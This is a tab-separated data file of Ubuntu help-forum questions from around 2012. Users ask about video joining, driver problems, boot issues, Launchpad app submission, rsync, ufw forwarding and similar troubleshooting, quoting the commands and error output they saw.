161226	how to join video files from terminal ?	i have tried avidemux2_cli , mencoder , ffmpeg , cat.. but this does n't always work ( with the most of the times the error is that the audio codec is not the same ) maybe i put wrong options in the commands . so the commands : cat sample.avi rrr.avi > complete.avi ffmpeg -i sample.avi -i output.avi -vcodec copy -acodec copy complete.avi mencoder -ovc lavc -oac copy sample.avi rrr.avi -o complete.avi avidemux2_cli -- audio-codec copy -- video-codec copy -- output-format avi -- load sample.avi -append output.avi -- save video.avi the cat problem is that it does n't show error but it does n't work always..like the complete.avi will be exactly the same with sample.avi fmmpeg does nothing . the complete.avi is always the same with sample.avi mencoder error : all files must have identical audio codec and format for -oac copy . so the complete.avi is the same with sample.avi avidemux2_cli there is no error but the complete.avi is again the same with sample.avi.. so to sum up , all complete.avi are the same with sample.avi.. and the problem is that they do n't have the same audio codec ( i quess ) .. any ideas ?
161227	why does running bash scripts containing java commands give me `` missing classes '' error ?	a have few .sh files that i want to run . i was a regular windows user , so i have n't much of idea about it . i had .bat files , which were doing proper work for me . but when i switched to ubuntu it 's showing an error : proton @ proton-5750 : ~/desktop/nand to tetris $ ./hardwaresimulator.sh exception in thread `` main '' java.lang.noclassdeffounderror : hardwaresimulatormain caused by : java.lang.classnotfoundexception : hardwaresimulatormain at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : hardwaresimulatormain . program will exit . proton @ proton-5750 : ~/desktop/nand to tetris $ ./hardwaresimulator.sh exception in thread `` main '' java.lang.noclassdeffounderror : hardwaresimulatormain caused by : java.lang.classnotfoundexception : hardwaresimulatormain at java.net.urlclassloader $ 1.run ( urlclassloader.java:217 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : hardwaresimulatormain . program will exit . i do n't why these java errors are happening in ubuntu ... guys give me solution , thanks in advance ... ..
161228	chromium input fields lag	every time i have to insert text into a text field in chromium insertion lags , it stops working for a second and i do n't see the text i 'm typing ( the cursor does n't move ) . after a moment the text field works again but after 10 seconds or so it stops again . very frustrating , same on google chrome . how can i sort this out ?
161229	3.4 mainline kernel : external storage is no longer automounted	i have just updated my kernel from 3.2 to 3.4 precise , so , after restarting ubuntu , i tried to connect my external hard or usb storage but is n't mounted . also , i check the output of # fdisk -l command , but i can not find my usb storage / external hard label there . this is the output of # fdisk -l : device boot start end blocks id system /dev/sda1 2048 255999 126976 6 fat16 /dev/sda2 * 257040 262437839 131090400 7 hpfs/ntfs/exfat /dev/sda3 262437840 337252544 37407352+ 7 hpfs/ntfs/exfat /dev/sda4 337252606 976771071 319759233 f w95 ext 'd ( lba ) /dev/sda5 337252608 431521964 47134678+ 7 hpfs/ntfs/exfat /dev/sda6 431522028 576267614 72372793+ 7 hpfs/ntfs/exfat /dev/sda7 576273538 826046234 124886348+ 7 hpfs/ntfs/exfat /dev/sda8 826046464 842045439 7999488 82 linux swap / solaris /dev/sda9 842047488 900638719 29295616 83 linux /dev/sda10 900640768 976771071 38065152 83 linux i also check the output of # lsusb but my external hard name appears there , this the output of lsusb command : bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 004 : id 0c45:6416 microdia bus 002 device 006 : id 0bc2:5031 seagate rss llc freeagent goflex usb 3.0 < -- bus 001 device 005 : id 413c:8161 dell computer corp . integrated keyboard bus 001 device 006 : id 413c:8162 dell computer corp . integrated touchpad [ synaptics ] bus 001 device 007 : id 413c:8160 dell computer corp. wireless 365 bluetooth how do i do to solve my problem ? it is the serious problem for me , help me to solve . thanks for your attention and sorry if it duplicates with another thread ! edit [ 1928.674377 ] show_signal_msg : 27 callbacks suppressed [ 1928.674390 ] unity-2d-shell [ 3041 ] : segfault at 329 ip 00007fe4cef80dd7 sp 00007fff19d68420 error 4 in libqtdbus.so.4.8.1 [ 7fe4cef4f000+7b000 ] [ 2018.282180 ] usb 2-1.1 : usb disconnect , device number 5 [ 2029.593959 ] usb 2-1.1 : new high-speed usb device number 6 using ehci_hcd [ 2762.789721 ] usb 2-1.3 : new high-speed usb device number 7 using ehci_hcd [ 2793.794120 ] usb 2-1.3 : usb disconnect , device number 7 [ 4184.355678 ] usb 2-1.1 : usb disconnect , device number 6 [ 4200.064570 ] usb 2-1.1 : new high-speed usb device number 8 using ehci_hcd [ 6736.417629 ] usb 2-1.1 : usb disconnect , device number 8 [ 6748.266537 ] usb 2-1.2 : new high-speed usb device number 9 using ehci_hcd these lines are the output for # dmesg | tail command . i can not find the usb device with label starting sdb ! edit 2 the output for command # ls /dev is as follow ; autofs mcelog sda2 tty25 tty58 ttys31 block mei sda3 tty26 tty59 ttys4 bsg mem sda4 tty27 tty6 ttys5 btrfs-control net sda5 tty28 tty60 ttys6 bus network_latency sda6 tty29 tty61 ttys7 cdrom2 network_throughput sda7 tty3 tty62 ttys8 cdrw2 null sda8 tty30 tty63 ttys9 char oldmem sda9 tty31 tty7 uinput console port sg0 tty32 tty8 urandom core ppp sg1 tty33 tty9 usbmon0 cpu psaux shm tty34 ttyprintk usbmon1 cpu_dma_latency ptmx snapshot tty35 ttys0 usbmon2 disk pts snd tty36 ttys1 v4l dri ram0 sr0 tty37 ttys10 vboxdrv dvd2 ram1 stderr tty38 ttys11 vboxusb dvdrw2 ram10 stdin tty39 ttys12 vcs ecryptfs ram11 stdout tty4 ttys13 vcs1 fd ram12 tty tty40 ttys14 vcs2 full ram13 tty0 tty41 ttys15 vcs3 fuse ram14 tty1 tty42 ttys16 vcs4 fw0 ram15 tty10 tty43 ttys17 vcs5 hidraw0 ram2 tty11 tty44 ttys18 vcs6 hpet ram3 tty12 tty45 ttys19 vcs7 input ram4 tty13 tty46 ttys2 vcsa kmsg ram5 tty14 tty47 ttys20 vcsa1 log ram6 tty15 tty48 ttys21 vcsa2 loop0 ram7 tty16 tty49 ttys22 vcsa3 loop1 ram8 tty17 tty5 ttys23 vcsa4 loop2 ram9 tty18 tty50 ttys24 vcsa5 loop3 random tty19 tty51 ttys25 vcsa6 loop4 rfkill tty2 tty52 ttys26 vcsa7 loop5 rtc tty20 tty53 ttys27 vga_arbiter loop6 rtc0 tty21 tty54 ttys28 vhost-net loop7 sda tty22 tty55 ttys29 video0 loop-control sda1 tty23 tty56 ttys3 zero mapper sda10 tty24 tty57 ttys30
161231	ca n't do submitubuntu for appshowdown	i now got the point where i finished my development and wanted to perform quickly submitubuntu but it fails with : andre @ andre-desktop : ~/entwicklung/ubuntu/armorforge $ quickly submitubuntu lade launchpad-einstellungen erfolgreich mit launchpad verbunden ... ... ... ... .ubuntu packaging created in debian/ ... ... . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- befehl gab einige fehler zurück : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- bzr : error : verbindung geschlossen : unexpected end of message . please check connectivity and permissions , and report a bug if problems persist . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- fehler : quickly kann das projekt nicht herausgeben : kann es nicht zu launchpad hochladen . fehler : befehl submitubuntu fehlgeschlagen wird abgebrochen i tried all the fixes suggested on http : //developer.ubuntu.com/2012/07/ubuntu-app-showdown-deadline-approaching-get-your-submissions-ready/ but it did not workout for me . i already performed quickly share which worked for me . the result can be seen in https : //launchpad.net/~andre-herrmann/+archive/armorforge according to the rules of the appshowdown i would be disqualified then , which would make me very sad and my wife mad . it also seems that the submitubuntu-command changed my version number to some kind of date , what i ca n't understand , but i hope this is usual . well what can i do to bring my app to the contest ? please help ! thanks and regards , andré edit : hi florian , i tried your suggestions but i 'm not so into deep with bazaar . my allday thing is subversion . here are the results : andre @ andre-desktop : ~/entwicklung/ubuntu/armorforge $ quickly save committing to : /home/andre/entwicklung/ubuntu /armorforge/ bzr : error : no changes to commit . please 'bzr add ' the files you want to commit , or use -- unchanged to force an empty commit . es gibt anscheinend keine änderung zu erfassen . fehler : befehl save fehlgeschlagen wird abgebrochen andre @ andre-desktop : ~/entwicklung/ubuntu/armorforge $ bzr push bzr : error : no push location known or specified . andre @ andre-desktop : ~/entwicklung/ubuntu/armorforge $ quickly save -- unchanged committing to : /home/andre/entwicklung/ubuntu /armorforge/ bzr : error : no changes to commit . please 'bzr add ' the files you want to commit , or use -- unchanged to force an empty commit . es gibt anscheinend keine änderung zu erfassen . fehler : befehl save fehlgeschlagen wird abgebrochen andre @ andre-desktop : ~/entwicklung/ubuntu/armorforge $ bzr push bzr : error : no push location known or specified . andre @ andre-desktop : ~/entwicklung/ubuntu/armorforge $ quickly configure bzr lp : ~andre-herrmann/armorforge/trunk^c andre @ andre-desktop : ~/entwicklung/ubuntu/armorforge $ bzr push lp : ~andre-herrmann/armorforge/trunk permission denied ( publickey ) . connectionreset reading response for 'bzrdir.open_2.1 ' , retrying permission denied ( publickey ) . bzr : error : verbindung geschlossen : unexpected end of message . please check connectivity and permissions , and report a bug if problems persist . andre @ andre-desktop : ~/entwicklung/ubuntu/armorforge $ somthing seems to be wrong with my public key which is hard for me to understand , because the share option worked so far and also uses keys . any clue ? thanks for your help so far : - )
161233	set ati/amd gpu fan speed with mesa driver	my video card 's ( sapphire ati radeon hd 3650 ) temperature reaches 150째c in 5 minutes and then it stops working . i installed fglrx and it works now . i can even play 3d games for 5-30 minutes . if i use the live cd and fglrx is n't installed ( it uses mesa driver then ) how can i control the fan ?
161235	how can i find out the file path for my laptop 's dvd drive	normally i insert a dvd in the drive and i get a prompt that leads me to the movie player app and all is well . how can i find the drive file in the event the prompt does n't show up or something goes wrong . i looked in the dev directory and nothing jumped out at me ?
161236	desktop does n't load after install/restart ( dual boot )	i 've just finished installing ubuntu and windows for dual boot on separate partitions . i installed windows first because it 's pickier about partition style ( mbr ) and that went fine . i shrank the disk and left a bunch of free space for ubuntu . i then installed ubuntu 12.04 desktop ( in low graphics mode ) , but after finishing the install and getting to the prompt to restart the computer , it boots straight into windows without asking which operating system to load . i suspect that the boot loader is n't being installed properly but i do not know how to verify this .
161239	where can i find my original 'sources.list ' file ?	note : if you have lost and want to recreate your /etc/apt/sources.list file , please use the ubuntu source generator , with the appropriate choices . warning : any custom repositories you added to your old sources.list ( but not ppas ) will be lost . where can the original /etc/apt/sources.list be found ? i know some forum posts and third party sites pasting it 's contents , but what is the official source for this file ? it must be somewhere on ubuntu.com ?
161246	why is the grub menu and boot splash smaller than my actual screen size ?	i 'm using ubuntu 12.04 , and when im in the grub menu there are black edges both at top/bottom and left/right . the same way it is in the plymouth splash , but additionally plymouth seems to be stretched like from 4:3 to 16:9 . i use an external amd gpu and the propritary drivers . any ideas ?
161249	.bashrc not executed when opening new terminal	the code in .bashrc does not execute when i open a new terminal window in ubuntu 12.04 . i noticed this when creating a .bash_aliases file . the aliases did not show up when i opened a new terminal . however when i type source .bashrc the aliases did show up . .bashrc should be run everytime i open a new terminal window right ? how do i make this happen ?
161251	how do i correct items that are now upstart jobs but still have an entry in /etc/init.d ?	how do i correct items that are now upstart jobs but still have an entry in /etc/init.d ? i have an ubuntu 12.04 machine which complains in the boot.log file like : since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s01dmesg rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s01hostname start how do i fix these seemingly broken services ?
161257	running gigabyte wifi bluetooth card gc-wb150	did anyone try running gigabyte card gc-wb150 card with success ? what drivers should be used ? any help will be appreciated . i found it is atheros chipset at9485 ( 168c:0037 ) but it seems the driver is not implemented .
161272	path for source files	where should i add source files for my program ? i created a folder /data/src and put the files there . in my python code i tried to point with os.getcwd ( ) to it . this works for quickly run but if i install my application it gives me an ioeroor for home/username/myapp/data/src . how i can ajust the username ? thanks
161273	is there a google drive client available ?	i 'd like to install a google drive client for xubuntu ( 12.04 ) . i 'm getting non-english google results , and i did n't find grive in the xubuntu repositories . does anyone know of a client that works well for ubuntu or it 's supported derivates ( or installation instructions for grive ? )
161277	how do i install teamviewer host ?	how do i install teamviewer 7 host on ubuntu server 12.04 ?
161278	eclipse indigo crashes on ubuntu 12.04 everytime	i have tried reinstalling it ... # # a fatal error has been detected by the java runtime environment : # # sigbus ( 0x7 ) at pc=0xb77be97b , pid=2181 , tid=3076359872 # # jre version : 7.0_05-b05 # java vm : java hotspot ( tm ) client vm ( 23.1-b03 mixed mode linux-x86 ) # problematic frame : # c [ ld-linux.so.2+0xb97b ] _dl_rtld_di_serinfo+0x2e5b # # failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again # # if you would like to submit a bug report , please visit : # http : //bugreport.sun.com/bugreport/crash.jsp # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . #
161279	how do i move my lvm 250 gb root partition to a new 120gb hard disk ?	i have the following situation : my current ubuntu installation is running from an external hdd ( 250 gb ) because i was to lazy to buy an new internal hdd . now i 've got a new internal ( 120gb ) and i want to move everything to the internal . installing ubuntu new is out of disscussion because its to peronalized . luckily ( i hope so ) the root partition is partitioned with lvm , so i hope i can move the partition to the smaller internal hdd . is this possible ? and where do i find help ?
161282	my application quicklist goes missing when using `` quickly submitubuntu ''	i 'm trying to submit my app for the app showdown , but i 've just noticed that when i use the `` submitubuntu '' quickly command , my dynamic quicklist entries do n't work . i think this is because the desktop file gets renamed from tickit.desktop to extras-tickit.desktop i 'm coding a hacky fix to look for /usr/share/applications/extras-tickit.desktop and changing the argument for get_for_desktop_id ( ) if it exists , but is there a better way ? can i stop quickly renaming the desktop file ?
161284	why does running this program on 11.10 give a 'glibc_2.15 not found ' error ?	i am trying to install absinthe 2.0.4 on ubuntu 11.10 on a netbook . when i try to run the install file , this keeps on happening : rafael @ raflaptop : ~/desktop/absinthe-linux-2.0.4 $ ./absinthe.x86 ./absinthe.x86 : /lib/i386-linux-gnu/libc.so.6 : version `glibc_2.15 ' not found ( required by ./absinthe.x86 ) do i need to upgrade glibc ? if so , how do i do that ? since i 'm on a netbook i ca n't use a livecd so i wanted to know if there was a way i could fix this issue without reinstalling my whole os . any explanations about what glibc is exactly would be great too since this is a learning experience for me . i know that glibc is a part of libc.so.6 and so i tried to run sudo apt-get install libc.so.6 but was told that it was up to date . but glibc is n't ? i hope this articulates my problem well , if there are any pieces of missing info or questions to clarity my question , please let me know ! ~-~ edit/update : so after some help on the askubuntu chat room from user izx , i have gathered the following information/understanding : -i need to run this program with ubuntu 12.04 or recompile it from source -upgrading libc on oneiric to 2.15 while possible , is not an easy task and is not officially supported .
161285	error with slap.d while installing any new software	i am trying to install wireshark ( this issue is not specific to wireshark ) on my ubuntu box and i keep getting the following error for slap.d : setting up slapd ( 2.4.23-6ubuntu6.1 ) ... creating initial configuration ... mkdir : can not create directory `/etc/ldap/slapd.d ' : file exists dpkg : error processing slapd ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : slapd besides uninstalling or trying to update open ldap or slap.d , is there any other action that can be taken to resolve this issue ? i am trying the install as root user & i have tried moving the slap.d conf file so far but without any luck . any thoughts on troubleshooting/resolving this issue will be quite welcome . thank in advance
161289	rsync problems and security concerns	hi i am attempting to use rsync to copy files between two linux servers . both on 10.04.4 i have set up the ssh and a script running under a cron job . this is the message i get back from the cron job . to : mark @ ubuntu subject : cron ~/rsync.sh content-type : text/plain ; charset=ansi_x3.4-1968 x-cron-env : x-cron-env : x-cron-env : x-cron-env : message-id : < 20120708183802.e0d54fc2c0 @ ubuntu > date : sun , 8 jul 2012 14:38:01 -0400 ( edt ) rsync : link_stat `` /home/mark/ # 342 # 200 # 223rsh=ssh '' failed : no such file or directory ( 2 ) rsync : opendir `` /library/webserver/documents/.cache '' failed : permission denied ( 13 ) rsync : recv_generator : mkdir `` /library/library '' failed : permission denied ( 13 ) * skipping any contents from this failed directory * rsync error : some files/attrs were not transferred ( see previous errors ) ( code 23 ) at main.c ( 1060 ) [ sender=3.0.7 ] q.1 can anyone tell me why i get this message -- > rsync : link_stat `` /home/mark/ # 342 # 200 # 223rsh=ssh '' failed : no such file or directory ( 2 ) the script is : # ! /bin/bash sourcepath='/library' destpath='/library' desthost='192.168.1.15' destuser='mark' logfile='rsync.log' echo $ '\n\n ' > > $ logfile rsync -av –rsh=ssh $ sourcepath $ destuser @ $ desthost : $ destpath 2 > & 1 > > $ logfile echo “completed at : `/bin/date`” > > $ logfile q2 . i know i have several problems with the permissions all of the files i am copying usually require me to use sudo to manipulate them . my question is then is there a way i can run this job without giving my user root access or using root in the login ? ? thanks for the help .
161295	confused about application submission	i finished my app but i 'm totally confused about how to submit it to launchpad and the software center . i 'm also new to launchpad . 1 ) i created a project at launchpad and synchronized an openpgp key via the password tool . this was about 30 minutes ago but launchpad still shows `` no openpgp keys registered . '' is this normal ? 2 ) what i have to do next with the ppa ? 3 ) how do i submit my app ? do i have to adjust files with the ppa ? the showdown blog shows that quickly submitubuntu is enough but here in the forum i read about quickly release or quickly share . so which one is correct ? 4 ) do i have to add this file to launchpad as well ? 5 ) do i get a confirmation that my app was correctly submitted and take part of the contest ? since i do it for first time i want to be sure that everything is ok . i 'm sorry for all my questions and i know that there are many topics about it but everywhere something different is written and i 'm confused how to proceed . thanks in advance ! edit : after a lot of readings i found this two threads the most helpful : upload quickly project to launchpad with `` quickly share '' not working ! launchpad failed to build after `` quickly submitubuntu '' i hope i did everything correctly ...
161297	why does my screen blank out for the duration of the grub boot menu ?	upon booting , when i should see the grub menu , my monitor simply says : `` no optimum mode . recommended mode : 1600*1200 '' . if i wait for a short while , ubuntu starts to boot and it reaches the desktop . so i guess there is no video signal during that time , there 's the grub menu but i cant see it and after the wait time everything is fine . i have the same problem when i log out for a short moment , before the log in screen is reached . and this also happens when i shut down ubuntu . the vga is an onboard nvidia geforce 7025 .
161299	how to overcome `` permission denied '' running c program even after `` chmod +x '' ?	after compiling a c program on ubuntu 10.10 , after executing chmod +x ./a.out , i am still getting bash : ./a.out : permission denied . how can i run my new executable ?
161303	how can i check if python´s configparser has a section or not ?	how can i check if the configparser mainfile has a section or not , and if it don´t then add a new section to it ? i am trying with this code : import configparser config = configparser.configparser ( ) # if the config file don´t has the section 'globel ' , then add it to the config-file if not config.has_section ( `` globel '' ) : config.add_section ( `` globel '' ) config.set ( `` globel '' , `` settings '' , `` someting '' ) config.write ( open ( `` /tmp/myfile.conf '' , `` w '' ) ) print `` the new sestion globel is now added ! ! '' # else just return the the value of globle- > settings else : config.read ( `` /tmp/myfile.conf '' ) print `` else ... globle- > settings == `` +config.get ( `` globel '' , `` settings '' )
161304	where does thunderbird store archived imap emails ?	i am using thunderbird to read my gmail and yahoo emails . both using imap . then in the synchronization & storage option of the account , i tick the check-box with the message : keep messages for this account on this computer . so , where on my filesystem does thunderbird store these archived messages ? p.s . i have the ~/.mozilla and ~/.thunderbird folders in my home directory .
161313	how do i change directories in the terminal , and know which directory i 'm in ?	i am following the directions @ ubuntu community help ; however , i am still confused about a few things . i researched it & found this post : using the terminal to change directory , but it 's above me & i 'm still not sure how to go about it . i 'm new & need a bit extra direction so stick with me ! ; - ) the following is the script from my terminal : christy @ ubuntu : ~ $ ls desktop examples.desktop install-tl-unx.tar.gz pictures templates documents install-pkgs.log libnautilus-gksu.so projects videos documents install-pkgs.log libnautilus-gksu.so projects videos christy @ ubuntu : ~ $ cd/ bash : cd/ : no such file or directory how do i tell what is in which directory and how do i navigate the directory . i know i must be leaving out something simple .
161316	how do i get my bcm43228 card working in mainline kernel 3.4 or higher ?	i followed https : //wiki.ubuntu.com/kernel/mainlinebuilds to install kernel 3.4 and 3.5 from debs . unfortunately after booting i ca n't connect to the internet cause i have problems with my network device bcm43228 . the proprietary driver can not be activated . jockey logs have : 2012-07-08 22:13:06,796 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-07-08 22:13:06,854 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-07-08 22:13:06,873 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-07-08 22:13:08,843 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-07-08 22:13:12,818 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2012-07-08 22:13:12,819 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver and trying to do : sudo apt-get install -- reinstall bcmwl-kernel-source results in : reading package lists ... building dependency tree ... reading state information ... 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded . need to get 0 b/1,151 kb of archives . after this operation , 0 b of additional disk space will be used . ( reading database ... 314137 files and directories currently installed . ) preparing to replace bcmwl-kernel-source 5.100.82.38+bdcom-0ubuntu6.1 ( using ... /bcmwl-kernel-source_5.100.82.38+bdcom-0ubuntu6.1_amd64.deb ) ... removing all dkms modules done . unpacking replacement bcmwl-kernel-source ... setting up bcmwl-kernel-source ( 5.100.82.38+bdcom-0ubuntu6.1 ) ... loading new bcmwl-5.100.82.38+bdcom dkms files ... building only for 3.5.0-030500rc6-generic building for architecture x86_64 building initial module for 3.5.0-030500rc6-generic error ( dkms apport ) : kernel package linux-headers-3.5.0-030500rc6-generic is not supported error ! bad return status for module build on kernel : 3.5.0-030500rc6-generic ( x86_64 ) consult /var/lib/dkms/bcmwl/5.100.82.38+bdcom/build/make.log for more information . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-030500rc6-generic is there any support for this driver in linux > = 3.4 ?
161321	how to install gluezilla-dev ?	gluezilla was removed from latest ubuntu repository for some silly reason . this library is necessary for mono web libraries to work properly ( without gluezilla the web browser component does n't work ) . how do i install it on ubuntu ? it has an incredible dependency tree of packages that were in older ubuntu versions but for some reason are n't in current ubuntu . is there any way to install it other than downgrading to older ubuntu ?
161326	is it possible to have lxtask as the sole task manager and to remove the gnome system monitor ?	if so , having lxtask installed by now , which package am i supposed to uninstall ? otherwise , i 'd simply uncheck the gnome system monitor in the lxpanel settings . kind regards , schlossblick
161327	how to delete the last gnome panel ?	how do i get rid of the last panel in classic gnome session in 12.04 ? i could n't find any way for precise .
161328	ubuntu not booting from usb on laptop ( no optical drive )	i 'm using a kingston 16gb usb , with the unetbootin program . ( i 've tried both downloading the installation iso manually and adding it , or using the program to download . ) i 've tried creating the bootable usb on an imac , the laptop and also a desktop . i 've booted into the setup of the laptop and changed the boot order to make sure it boots from that drive first . ( there is no optical drive so that is n't a problem . ) it 's an acer aspire as3810tz . upon booting it gives this message : syslinux 4.03 2010-10-22 edd copyright ( c ) 1994-2010 h. peter anvin et al i get this no matter how i create the usb , it just sits there . i left the laptop for an hour and it had n't moved . i 've also tried on a different 4gb usb ( generic ) and that did the same .
161332	computer refuses to boot either ubuntu disk i 'm using	i 'm attempting to set up an amahi server , and thus have taken an older pc and wiped it clean using dban . i 'm now in the process of installing ubuntu , but for some reason the computer refuses to recognize either form of ubuntu i throw at it , even though it recognizes the windows xp cd fine . things it ca n't be : boot order - i 've tripple checked a bad dvd - i 've booted the live cd off of my mac just fine . a drive issue - the drive boots other cd 's just fine , i 've tested both an xp and the ultimate boot disk for windows ... they are booting fine . a drive conflict - i have unplugged the only hard drive , leaving the dvd drive alone , still no recognition . i 've tried both ubuntu 12 and an older ubuntu 10 cd , it refuses to recognize either one . it 's like my computer has decided it will have nothing to do with ubuntu . any help would be greatly appreciated .
161333	why does apt give me a `` dynamic mmap ran out of room '' error when trying to upgrade 6.06 lts ?	i need to update serveral remote ubuntu servers running 6.06 ( even lts is n't that long ) . they are all at different remote locations . i would like to at least have a shot at upgrading without the trips , but ( apparently ) the sources are not available . for example : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/dapper-updates/main/binary-i386/packages.gz 404 not found [ ip : 91.189.92.181 80 ] this site suggested changing sources.list . it fails e : dynamic mmap ran out of room e : error occurred while processing brother-lpr-drivers-bh7 ( newversion1 ) e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_pre cise_multiverse_binary-i386_packages e : the package lists or status file could not be parsed or opened . suggestions ?
161335	how do i remove windows after installing ubuntu 12.04 via wubi	i 'm about to install ubuntu by using wubi . can i then delete windows and keep ubuntu ?
161337	ubuntu does not work with nvidia drivers , gives random squares after logging in	i tried installing both with wubi and by booting from a usb drive . after i tried both it was the same . ubuntu tried to login , but after a while , a weird pattern with squarely shapes appeared . at one point , after using recovery mode and then the low graphics one ( i do n't remember how it was called exactly ) i managed to get in . it still did n't display at correct resolution , and the mouse was invisible at times . however , after rebooting once , because i tried downloading the nvidia drivers , i did n't manage to get in again , so i have the same problem ... i have no idea what to try to become unstuck . the main problem is that after the login , ubuntu crashes , with a screen full of randomly coloured squares . should i just give up ?
161340	how do i force a shutdown even when there are other open sessions ?	well , hello , this is my first time using ubuntu and i have seen that when i try to turn off the computer when other user sessiong is running it does n't do nothing . then i have to enter that user session and close it or turn off in it to do it work . sorry if i use a bad english , it 's because it is n't my native languaje . thanks .
161342	is it worth upgrading ubuntu 10.04 to 12.04 ?	a few years ago , i used ubuntu 10.04 , and i liked it a lot . it never crashed . then i have to change to win*** because of work . but this year , i heard about ubuntu 12.04 and i wanted to install it . i 've done this , but i have a lot of crashes . i do n't do something special to make ubuntu crash , but sometimes it shows me a crash message . so , is it worth migrating to 12.04 ? do somebody stay with the 10.04 ? i really want to use ubuntu , and i will , but i do n't know if it worth to use the newest release or with the 10.04 . if i install the 10.04 version , ubuntu tells me all the time to upgrade to the new version ? or will i use it fine ? what do you suggest me ? thanks everybody for your time , and sorry for my english .
161345	what does `` paths must precede expression '' mean when using find ?	i want show all the files that have a .bak extension . kaykav @ ubu2 : ~/documents $ ls cdindex1-60 met.bak tem.bak i type the cmd : $ find . -name *.bak i 'm in the correct directory for this . i get the following message : find : paths must precede expression : tem.bak what does that mean ? man pages are no help .
161346	how to configure ufw to allow ip forwarding ?	i have ufw , openvpn and virtualbox installed on my home server . i have a host-only network for my virtual machine guests ( vboxnet0 ) set up with the ip range 10.0.1.0 , and another ip range of 10.0.0.0 configured on the other end of the openvpn connection . ip forwarding is configured on the host , so when ufw is disabled they can talk to each other without any issues . however , i 'd like to run ufw as this host will be web-accessible and i 'd like some access control . how can i configure ufw to allow this sort of traffic ? i 've tried various combinations of : ufw allow allow in|out on vboxnet0|tun0 with no success . my ufw rules are : root @ gimli : ~ # ufw status status : active to action from -- -- -- -- -- -- 22 allow anywhere anywhere allow 10.0.0.0/16 anywhere on vboxnet0 allow anywhere anywhere on tun0 allow anywhere anywhere allow out anywhere on vboxnet0 anywhere allow out anywhere on tun0 any help would be greatly appreciated .
161347	backup android phone ( huawei ascend p1 ) on ubuntu	is it possible to backup the android mobile phone when connected to ubuntu ? i have looked trough and searched here , but could n't find any answers to this question . i have just bought a android phone ( with android 4 ) . any hints and tips on what i can sync with ubuntu would be great . and if you have any suggestions to apps i can use on ubuntu to make it easier , please add the name of the app and how i can install it . thank you : )
161353	ubuntu 12.04 fullscreen video dual screen	i recently starting getting this issue when making full screen videos . so two things happen pretty consistently . the video tries to fullscreen and fails and snaps back to window or it succeeds and the video is full screen on the entire length of the two monitors . i would like for it to full screen on one of the monitor , preferably my main monitor . right now what it thinks is that the system is one giant monitor which is useless . so i was n't clear i am talking about youtube , vimeo , flash based video in the browser . i appreciate any help . thanks .
161354	can i upgrade ubuntu from a windows burnt disc ?	i currently have ubuntu 10 ( or 11 ) on my laptop but no internet access so i ca n't use update manager . i want to burn a disc from ( this ) windows computer to take home for the upgrade . will this be exactly the same process as burning and installing straight from windows ? the instructions clearly state that to burn a disc from windows is to install from windows , no actual burn disc from windows and update previous ubuntu os instruction .
161360	why does ubuntu really slow down the rest of my home network ?	i have a ubuntu desktop and a windows 7 desktop . the windows 7 machine is connected via wireless adapter and the ubuntu desktop is connected via ethernet . the wireless adapter is capable of 300mbps link speed . when my ubuntu is connected to the internet , the network becomes very very slow . i have a 15 mbps cable broadband connection . i have had many devices connected at one with no problem , yet this one connection seems to be wreaking havoc .
161363	why do n't 12.04 nvidia drivers work on my geforce 6150 le ?	i got a slimline s7600n and of course i put ubuntu 12.04 on it . im using recommended proprietary drivers and they are just not working to well . my monitor is 1366x768 but it will only do 1360x768 and minecraft barely runs at all . besides that everything is fine . but i gota play minecraft ! help ! lol thanks . : ) other specs is cpu amd athlon 64 dual core 2ghz ram 1 gig vid is 256mb 64bit not sure what other info yall need .
161365	how do i remove ubuntu from a dual-boot windows 7 laptop ?	i 'm new to ubuntu and liked it a lot ! however after testing it on my old crappy laptop i now want to remove it . i 've looked at tutorials on how to uninstall and it says to start by deleting the linux partition of the hard drive . however after opening computer management , i can not locate my linux partition . same as when i go to system configuration and click on the `` boot '' tab , my computer does not list any operating system other than windows 7 . any way around this or perhaps a different way to uninstall ?
